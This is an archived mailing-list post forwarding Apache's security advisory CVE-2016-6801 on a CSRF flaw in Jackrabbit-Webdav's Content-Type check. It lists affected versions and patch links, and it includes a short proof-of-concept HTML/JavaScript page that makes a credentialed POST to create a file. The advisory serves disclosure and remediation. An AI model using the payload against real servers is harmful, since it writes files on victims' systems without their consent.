jackrabbit-announce mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Julian Reschke <resc...@apache.org>
Subject Fwd: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
Date Thu, 15 Sep 2016 08:00:40 GMT
(FYI - forgot this mailing list in my initial mail)


-------- Forwarded Message --------
Subject: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
Date: Wed, 14 Sep 2016 14:34:22 +0200
From: Julian Reschke <reschke@apache.org>
Reply-To: dev@jackrabbit.apache.org
To: Lukas Reschke <lukas@statuscode.ch>, Jackrabbit Users 
<users@jackrabbit.apache.org>, dev@jackrabbit.apache.org 
<dev@jackrabbit.apache.org>, security@apache.org <security@apache.org>, 
oss-security@lists.openwall.com, bugtraq@securityfocus.com

CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing 
Content-Type header fields, nor variations in field values with respect 
to upper/lower case or optional parameters. This can be exploited to 
create a resource via CSRF.

Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in 
http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released
2.6.x users upgrade to 2.6.5 and apply the patch in 
http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released
2.8.x users upgrade to 2.8.2 and apply the patch in 
http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3

Example:
A resource can be created like so:
<html>
    <body>
      <script>
        function submitRequest()
        {
          var xhr = new XMLHttpRequest();
          xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
          xhr.withCredentials = true;
          var body = "This file has been uploaded via CSRF.=\r\n";
          var aBody = new Uint8Array(body.length);
          for (var i = 0; i < aBody.length; i++)
            aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
        }
      </script>
      <form action="#">
        <input type="button" value="Submit request" 
onclick="submitRequest();" />
      </form>
    </body>
</html>

Credit:
This issue was discovered by Lukas Reschke.


Mime
View raw message